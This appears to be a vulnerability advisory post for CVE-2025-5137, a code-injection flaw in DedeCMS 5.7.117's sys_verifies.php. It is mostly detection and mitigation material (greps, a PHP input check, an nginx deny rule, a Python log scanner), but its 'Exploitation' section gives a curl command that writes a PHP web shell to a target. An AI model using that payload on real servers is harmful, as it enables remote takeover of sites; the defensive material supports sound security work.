How CVE-2025-5137 Works
This vulnerability stems from an incomplete fix of CVE-2018-9175 in DedeCMS 5.7.117 and is reachable via `dede/sys_verifies.php?action=getfiles`. The `refiles` parameter is not sufficiently sanitized, so unauthenticated remote attackers can inject PHP code through it. When the injected payload is processed, it executes on the server with the web server's privileges, enabling arbitrary command execution, file manipulation, or full system compromise. The attack vector is network-based, requires no user interaction, and abuses the existing file verification mechanism to bypass security checks.
DailyCVE Form
Platform: DedeCMS
Version: 5.7.117
Vulnerability: Code Injection
Severity: Critical
Date: 06/10/2025
Prediction: Patch by 08/2025
What Undercode Say:
Exploitation:
```shell
curl -X POST "http://target.com/dede/sys_verifies.php?action=getfiles" \
  -d "refiles=malicious.php&content=<?php system(\$_GET['cmd']); ?>"
```
Detection:
```shell
grep -r "sys_verifies.php" /var/www/html/dedecms/
```
Mitigation:
1. Temporary Fix:
```php
// Temporary fix: add input validation near the top of sys_verifies.php.
// The original one-liner had two defects: the leading "//" commented out the
// whole check, and the unescaped "." in the pattern matched any character.
// An extension check alone is a stop-gap; restricting access to the script
// (step 2) is the stronger control until the vendor patch is applied.
if (isset($_REQUEST['refiles']) && preg_match('/\.php$/i', $_REQUEST['refiles'])) {
    die("Invalid file type");
}
```
2. WAF Rule:
```nginx
location ~ /dede/sys_verifies.php { deny all; }
```
3. Log Analysis:
```shell
awk '/POST \/dede\/sys_verifies.php/ {print $1}' /var/log/apache2/access.log
```
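The log-analysis step above, extended as an added example (not code from the original post or from DedeCMS): it parses Apache combined-format lines, flags every request to `/dede/sys_verifies.php` with `action=getfiles`, and records any `refiles` value ending in `.php` that is visible in the query string. The log lines, IPs and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2025:10:15:02 +0000] "POST /dede/sys_verifies.php?action=getfiles HTTP/1.1" 200 512 "-" "curl/8.5.0"
198.51.100.9 - - [10/Jun/2025:10:15:05 +0000] "GET /index.php HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2025:10:15:09 +0000] "GET /dede/sys_verifies.php?action=getfiles&refiles=malicious.php HTTP/1.1" 200 300 "-" "curl/8.5.0"
192.0.2.44 - - [10/Jun/2025:10:20:00 +0000] "GET /dede/sys_verifies.php?action=view HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return a dict for a well-formed log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec

def is_suspicious(rec):
    """True for any hit on the vulnerable getfiles action of sys_verifies.php."""
    if not rec or not rec["path"].endswith("/dede/sys_verifies.php"):
        return False
    # POST bodies are not logged, so a POST to getfiles cannot be cleared by
    # the query string alone; every getfiles request is reported for review.
    return rec["query"].get("action", [""])[0] == "getfiles"

def find_hits(log_text):
    """Collect suspicious requests with any .php refiles values seen in the query."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if is_suspicious(rec):
            refiles = rec["query"].get("refiles", [])
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                         "php_refiles": [f for f in refiles if f.lower().endswith(".php")]})
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```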
Post-Exploit Analysis:
```shell
# "-name '*.php'" is required; the original "-name '.php'" only matched a file literally named ".php"
find /var/www/html -name "*.php" -mtime -1 -ls
```
Patch Verification:
```shell
diff -u /patched/sys_verifies.php /vulnerable/sys_verifies.php
```
Indicators of Compromise (IoC):
- Unusual PHP files in `/dede/`
- HTTP POST requests to `sys_verifies.php`
- Modified timestamps on `.php` files
Reported By: nvd.nist.gov